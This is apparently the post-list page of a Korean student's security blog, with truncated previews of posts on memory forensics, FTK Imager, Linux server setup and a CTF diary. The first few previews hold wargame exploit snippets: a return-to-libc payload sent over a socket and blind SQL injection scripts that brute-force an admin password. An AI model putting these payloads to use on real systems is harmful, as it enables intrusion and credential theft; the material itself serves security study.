Lucete284

• rtl chain from socket import * HOST = ""PORT = 4444 s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"payload += "\xa.. Security Study/Source 2015. 11. 21.

• sql injection reverse import urllibimport urllib2 url = ""req = urllib2.Request(url)sql = "union select 0x61646D696E 32%"data = "id=%00&pw=" + sql[::-1]#data = urllib.urlencode(data)req = urllib2.Request(url, data) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')req.add_header('Cookie', 'PHPSESSID=') response = urllib2.urlopen(req)h.. Security Study/Source 2015. 11. 21.

• 소켓프로그래밍 from socket import * HOST = "" #hostPORT = 4444 #port s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260 #payload print s.recv(1024) #1024 byte reads.send(payload + "\n")print s.recv(1024)print s.recv(1024) Security Study/Source 2015. 11. 21.

• Blind Sql Injection #http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://codeshell.kr/probs/unsolvable/index.php?Username=admin'+and(substring(Password," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) print 1111 req.add_header('cookie',"PHPSESSID=") res = urllib2.urlopen(req) dat.. Security Study/Source 2015. 11. 21.

• Base 64 encoding import base64 str64=""str64=base64.b64encode(str64.encode('ascii'))for i in range(1,11): str64=base64.encodestring(str64) str64=str64.decode("utf-8")print(str64.replace("\n","")) Security Study/Source 2015. 11. 21.

• 

  구글 해킹 구글 해킹이란?이름만 보면 구글을 해킹하는 듯한 느낌이 든다. 그러나 이것이 구글 해킹이아니라 구글의 연산자들을 이용하여 알고자 하는 정보를 뽑아 내는 것을 말한다.구글에는 많은 연산자가 있다. 이를 이용하여 개인 정보 뿐만 아니라 많은 신상 정보를 알아 낼수 있다. 과연 구글 해킹이 얼마나 위험할까? 이러한 식으로 저자를 검색하면 이러한 블로그들이 나오는 것을 알수 있다.과연 이름이나 전화번호 같은 개인정보를 알고 있는 상황에서 검색을 하면 더 더욱 많은 자료와 더 많은 정보가 나올 것이다. 구글 해킹의 일반적인 공격을 보면따옴표(" ")따옴표를 이용하면 여러개 단어를 묶어서 검색할 수 있다. 예를들어, Pwn&Play z3alous라고 검색을 하면 ~ Pwn&Play ~ z3alous 로 검색이 되지.. Security Study/Web 2015. 11. 21.

• 

  lsof 명령어 프로세스 정보를 확인하기 위한 명령어는 lsof라는 명령어가 있다. lsof라는 명령어는 LiSt Open Files의 약자로 이름 그대로 수행하는 프로그 램이다. 좀 더 구체적으로, 현재 System에서 돌아가는 모든 Process에 의해서 Open된 파일들에 대한 정보를 보여준다.사용법은1. 어떤 특정한 파일을 사용하고 있는 프로세스들에 대한 정보를 알고 싶을 때,lsof 2. 어떤 파일 시스템 내에, 그렇게 큰 크기의 파일들을 찾을 수 없는데도 불구하고, Available Space가 0을 향해서 치닫고 있을 수도 있다. lsof 3. 긴급히 어떤 파일 시스템을 unmount해야 할 때, lsof는 파일 시스템 내에 있는 파일들에 대해서 억세스하고 있는 프로세스들을 다 찾아줄 수 있다.lsof 4... For3nsic/Forensic 2015. 11. 20.

• 

  volatility 사용법 3 printkey 이 명령어는 레지스트리 키값을 보여준다. netscan이 명령어는 활성화된 네트워크 정보를 알려준다.(windows 7에서만 사용가능) connections명령어를 이용하여 네트워크를 검사한다.여기서 더 자세히 알기위해 밑의 명령어를 사용한다. connscan 이 명령어는 위의 명령어와 같지만 이미 끊어진 네트워크도 나타내 준다. ] yarascan이명령어는 yara를 이용하여 유니코드 등을 검색하여 준다. For3nsic/The Art of Memory Forensic 2015. 11. 19.

• 

  volatility 사용법 2 kpcrscan이는 Finding Object Roots in Vista 에 묘사된 것처럼 자체참조 멤버들을 체크함으로써 잠재적 KPCR 구조들을 스캔하기 위하여 사용되는 명령어이다.IDT 와 GDT 주소, current,idle, 그리고 다음 쓰레드들, CPU 숫자, 벤더&속도, 그리고 CR3 값들을 포함하는 각각의 프로세서에 대한 자세한 세부 정보들에 대해 알아보기 위해 사용한다. 또한 이명령어를 사용하기 위해 profile이란 명령어를 사용해야하는데. profile 은 imageinfo명령어를 이용하여 알수있다. pslist이 명령어는 시스템의 프로세스들을 보여준다. PsActiveProcessHead 를 가리키는 이중연결리스트를 지나가며 오프셋, 프로세스 이름, 프로세스 ID, 부모 프로세스 ID.. For3nsic/The Art of Memory Forensic 2015. 11. 19.

• 

  Volatility 사용법 Volatility의 사용법에 앞써 사용을 하기위해 명령어를 알아야한다.먼저 -h 옵션을 줌으로 명령어 들을 볼수 있다. 또한 값을 저장하기 위해서는 명령어다음 > filename.txtWindowns Mac \ Windows 와 Mac이랑 명령어가 비슷한 거 같다. 이하 Mac으로만 하겠슴... 여기서 모르는 명령어를 찾아보며 해보면 되겠고 먼저 imageinfo 명령어를 사용해보겠다. imageinfo명령어는 다른 플러그인을 사용할 때 --profile=PROFILE----을 파라미터로 해야하는 제안된 프로파일을 알려주는 명령어이다.명령어를 사용하기위해 파일을 넣어야하는데... 명령어 사용방법은 vol.py -f For3nsic/The Art of Memory Forensic 2015. 11. 18.

• 

  Memory Forensic Volatility 설치 + 실행 요즘 MacBook을 사용하시는 하시는 분들이 많아서 일단 설치는 맥북위주로 하고 또한 사용법은 맥과 윈도우가 비슷 하므로 설명을 진행 하겠습니다.맥 같은 경우에는 윈도우와 다르게 터미널이라는 기능을 가지고 있어요!!! 터미널 리눅스에서 많이 사용하는건데 ... 이를 보면 맥이 유닉스나 리눅스 기반이라는 것을 알수 있을 껍니다.먼저 volatility를 설치하기위 해터미널을 열고 brew install volatility를 쳐주세요그럼 이러하게 다운 받는 것을 볼 수 있으실 껍니다.이렇게 다운 로드를 다받으시면 윈도우 사용자 분들은 CMD창에서 실행을 할껍니다. 어떻게 실행하냐 WINDOWS 이렇게 CMD창에서 실행시킵니다. 앞에 경로를 찾아가려니 힘들죠? 설치를 하고나시면 폴더있는데 그폴더에서 쉬프트(.. For3nsic/The Art of Memory Forensic 2015. 11. 18.

• 

  FTK Imager 알아보기 2 FTK Imager에서 메모리 캡쳐 하기 FTK Imager기능 중에서 메모리 캡쳐기능이있다.먼저 메모리 칩같이 생긴 것을 클릭한다. 클릭을 하면 이창이 나오는데 메모리 캡쳐가 되면 수집된 파일을 저장할 목적지 경로를 설정 하는 곳이다. 경로를 설정하고 Capture Memory를 이용하여 캡쳐를 시작한다. 이는 또한 옵션으로 Pagefile.sys 파일을 포함하고 AD1증거 파일 형식으로 만들 수 있다. 윈도우 상에서는 실행중인 레지스트리 파일을 복사하거나 저장할 수 없다. 이경우 FTK를 이용하여 보호된 레지스터를 얻고, 복사할 레코드를 얻을 수 있다. 메뉴바에서 표시된 것을 클릭하면 이러한 창이 뜨는데 이창에서는 얻어낸 파일을 저장할 폴더를 정해 주는 것이다.선택항목은 암호를 복구할 것인지 전체 레.. For3nsic/Forensic 2015. 11. 17.

• 

  FTK Imager알아보기 1 FTK를 이용하여 증거물 추가와 미리보기 기능을 알아보자메뉴바에서 File -> Add Evidence Item을 클릭하면 이러한 창이 나온다.그후 다음을 클릭하면 이러한 창이나오는 이창은 하드 디스크를 지정하는 창이다. USB같은 것이 연결 되어있을 경우 지정 가능하다. FINISH를 누르면 나오는 창이다. 그리고 옆에 보면 Evidence Tree 창에 증거물이 출력된다. 다음은 포렌식을 하기위한 이미지 생성을 알아보자! 이는 메뉴바에 보면 디스크 모양이 있는 것을 확인할수 있다. 디스크 모양을 클릭하여 이미지를 만들수있다. 클릭을 하면 이러한 창이 뜨는 것을 확인 할수있는데 Raw, SMART, E01, AFF가 이미지 타입으로 FTK에서 지원한다. 타입을 선택하고 다음을 누르게 되면 이러한 창을 .. For3nsic/Forensic 2015. 11. 17.

• 데이터 저장 매체 포렌식에서 중요한 증거를 수집할려면 증거가 어디에 저장되어 있고 저장될 수 있는 곳을 생각해야 한다. 데이터 저장 매체를 보면 하드디스크를 제외한 많은 곳에 데이터를 저장할수 있다.- 자기 미디어 - 플로피 디스크 - 하드 드라이브 - USB/PC카드 - ZIP이나 테이프 드라이브- 광학 미디어 - CD - DVD- 대체 미디어 - MP3 플레이어 - 태블릿 - 스마트 폰 - 비디오 게임, TV 등 For3nsic/Forensic 2015. 11. 17.

• 

  Chrome Forensic 이번엔 포렌식 중에 웹을 이용한 포렌식을 볼껀데...툴이름은 Chromeforensic이라는 툴입니다.실행을 시키면 이러한 GUI환경이 나오는 걸 볼수있습니다. 웹캐시 등을 받아올 폴더를 지정해야하는데 기본적으로 크롬 같은경우에는 아래의 절대경로를 이용합니다. C:\Users\사용자\AppData\Local\Google\Chrome\User Data\Default여기서 확인을 하면 이렇게 이미지도 띄어주는 것을 볼수있다. 이뿐만아니라 키워드 등을 검색하여 보기 편하게 쉽게 나온다.포렌식 중에서 웹 또한 매우 중요하다.이러한 툴을 알고 있으면 좋을 듯하다. For3nsic/Forensic 2015. 11. 16.

• 

  UBUNTU에서 QT다운받기 우분투에서 QT를 다운받아보자먼저 http://www.qt.io/download-open-source/ qt 오픈소스에 접속해서 다운받으면 run파일이 생성되어 있을 것이다. 이를 그냥 실행시키니 이러하게 많은 파일들이 설치된다...이렇게 설치된 파일은 설치하니 설치가 되지 않는다... 왜이럴까?리눅스에는 터미널이 있다. 이를 이용해 chmod 755 qt-unified-ninux-x64-online.run을 한 후 ./qt-unified-ninux-x64-online.run 이렇게 실행시키면 정상적으로 실행이된다.!!! 유후!! 이렇게 설치되는 것을 볼수있다. !! Security Study/Server(Linux) 2015. 11. 16.

• HDCON 후기! 2015년 11월 14일 아침 10시 ~ 11월 15일 아침 10시까지 진행된 HDCON!!!문제를 풀려고 압축을 푸니 솔직히 화가 났다.!이유는 용량! 너무 컷어요 !그래도 문제를 풀려고 문제를 보며 이것 저것 준비도 해본 후 START!~~!문제를 TRACK 1부터 보는데 리눅스!리눅스를 보며 80퍼 정도 접근 후 잠이 들어버렸어요 ㅠㅠ자고 일어나니 시간이 !!! 9시가 훌쩍 넘어 버렸더라구요...그래서 TRACK 3번에 네트워크 포렌식 문제를 보고 언눙 후딱 풀어 버렸습니다! ㅎㅎ문제가 어려운 만큼 재미도 솔솔 하고 먼가 배우는 듯한 느낌이 들더군요가장 아쉬운건 0-day는 0day가 아니다?인가 요 문제!!!화가난다 화가난다.!!!!못푼만큼 다시 풀어보고 싶은 문제였다. 또한 다른 TRACK 2 .. My Story 2015. 11. 16.

• Reading package lists Error Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Note, selecting 'Package' for regex 'Package' Done < == error vi /etc/apt/sources.list # Regular repositories deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security sana/updates main contrib non-free # Source repositories deb-src http://http.. Metasploit/Kali & Backtrack 2015. 11. 16.

• 메모리 분석 전 알아야 할 사항들 메모리 덤프 파일이란?메모리 내영이 가장 순수한 메모리 덤프파일을 시스템으로 부터 얻는 것을 말한다. 이를 얻기 위한 방법이 있다1 - 하드웨어를 이용하드웨어를 이용하면 메모리영역을 사용하지 않아 좀 더 정확한 메모리 덤프를 할수 있다. 뿐만 아니라 OS에 상관없이 사용 가능하다.- PCI장치- FireWire2 - 소프트웨어 도구를 이용한다.즉석에서 메모리 덤프 파일을 만들 수 있다.- DD - UNIX 도구- KntDD- MDD - open source- WIN32(64)DD - 윈도우- Fastdd3 - OS 크래시 덤프문제를 찾기위해 생성되는 덤프파일종류- 작은 메모리 덤프- 커널 메모리 덤프- 전체 메모리 덤프4 - 하이버네이션 파일이용 가상 메모리물리적인 실체를 가지고 있지 않은 메모리를 말하.. For3nsic/The Art of Memory Forensic 2015. 11. 14.

• 포렌식 기초 포렌식 증거처리 절차전에 앞에서 말한 바가 있다. 만약 포렌식을 한다고 말하고 다니는데 증거처리 절차 모르거나 한다면... 부끄럽다그래서 한번 더 강조한다. 왜냐? 중요하니깐.사전 준비 단계 -> 증거 수집 단계 -> 증거 이송 단계 -> 증거 분석 단계 -> 정밀 검토 단계 -> 결과 문서화 단계 이러한 순으로 된다!!! 사전 준비 단계증거 수집 단계증거 이송 단계*증거 분석 단계증거물 복제할 때에는 원본 증거물의 무결성 유지를 위해 쓰기방지장치를 해야 한다.또한 증거물 복제는 보관용과 분석용으로 나뉘는데 이 둘은 물리적 위치를 따로 지정하여 관리해야한다. *무결성* 매우중요한거다. 증거에 번호를 부여하고 원본 증거물 복제 과정을 기록해야 한다.증거물복제는 원본의 장치와 동일한 것에서 이루어지는 것이 .. For3nsic/Forensic 2015. 11. 11.

• 웹사이트 만든 후기... 웹 사이트를 만든 건 처음이다... 후기라 하니 음 ... 먼가 재밌었다. 다들 알듯이 빡치는 일은 많다. 그러나 하나하나 만들어가면서 보는 그 쾌감 컴퓨터를 하는 사람이면 다들 아는 쾌감일것이다. 3주동안 열심히 만들고 뻘짓도해보고 오만 짓을 다해보면서 많은 것을 배우고 느낀거 같다. 내 옆에서 도와준 친구 한명 짱 이다. 화이팅하자! My Story 2015. 11. 11.

• 서버 접속 메세지, PHPMYADMIN 주소 변경 ubuntu 서버에 접속을 했을 때 나를 반겨주는 사람이 있다면 얼마나 좋을까?그것을 위해 지금 여기서 글을써보겟다!!! 서버에 접속을 하고 나서 root 권한으로 vi /etc/motd을 치면 창이 뜨는데 하고 싶은말을 저장 후 :wq 로 저장을 완료하면 앞으로 서버에 접속하면 반겨줄 것이다.한글을 이용하고 싶으면 한글팩을 설치하면 한글 까지 사용할수 있다. 또한 phpmyadmin주소 변경원래 phpmyadmin접속은 도메인/phpmyadmin이면 접속을 한다.이를 바꾸기 위해 필요한것이 vi /etc/phpmyadmin/apache.conf 에접속 해서 Alias /phpmyadmin /usr/share/phpmyadmin 이것을 Alias /하고 싶은 주소/usr/share/phpmyadmin 하.. Security Study/Server(Linux) 2015. 11. 11.

• 디지털 포렌식이란? 디지털 포렌식이란 무엇일까? 포렌식 -> 법의학컴퓨터 미디어에 전자적으로 저장된 데이터를 취득,보존,복구,제출하는 것과 관련된 방법론이다.또한 경찰과 검찰이 쓰는 수사 기법중 하나이다.즉, 디지털 기기에서 많은 정보를 찾거나 복구하는 일이다. 다만 중요한점은 포렌식이 법의학처럼 법정에서 사용될수 있다는 것이다. 포렌식의 종류에는 여러가지가 존재한다.컴퓨터 포렌식, 모바일 포렌식, 임베디드 포렌식, 네트워크 포렌식 등등 포렌식 적용 분야1 - 사이버 범죄 및 지능 범죄2 - 일반 및 강력 범죄3 - 인터넷 침해사고 조사4 - 사용자의 부정이나 범죄 행위에 대한 조사 For3nsic/Forensic 2015. 11. 10.

• 휘발성 순서 And 포렌식 수집할 증거의 우선 순위를 정하는 것이 좋다.그러나 휘발성이 강한 것부터 수집하는 것이 좋을 듯하다. 휘발성 순서1 - CPU, 캐시 및 레지스터 데이터2 - 라우팅 테이블, ARP 캐시, 프로세스 테이블, 커널 통계3 - 메모리4 - 임시 파일 시스템 / 스웝 공간5 - 하드 디스크에 있는 데이터6 - 원격에 있는 로그 데이터7 - 아카이브 매체에 있는 데이터 RAM에 있는 증거휘발성 메모리(RAM)에는 현재 실행 중인 프로세스, 실행된 콘솔 명령어, 암호화되지 않은 비밀번호, 암호화되지 않은 데이터, 메신저 내용, IP주소, 악성코드 등 중요한 증거가 저장되어 있을수 있다. For3nsic/The Art of Memory Forensic 2015. 11. 10.

• 

  파티셔닝과 디스크레이아웃 등 파티셔닝과 디스크 레이아웃 오늘날 가장 많이 사용하는 두 가지 주요 파티셔닝 방식은 MBR(Master Boot Record) 방식과 GUID Partition Table(GPT)이다. MBR 파티셔닝 기법은 기본적으로 오직 네 개의 프라이머리 파티션과 최대 2테라바이트 크기의 디스크만 지원한다. GPT 형식은 8 제타바이트 크기의 디스크까지 지원하며 128개의 프라이머리 파티션을 만들수 있다. 파티션 식별 및 복구삭제되거나 사라진 파티션을 식별할 때는 앞에서 언급한 sigfind 명령을 사용할 수 있다. 이 도구는 파티션 테이블이나 파일 시스템 헤더의 숨길 수 없는 흔적을 찾아주는 사전 정의된 여러 데이터 구조 템플레이트를 가지고 있다. RAIDRedundant Array of Inexpensive D.. For3nsic/Forensic 2015. 11. 10.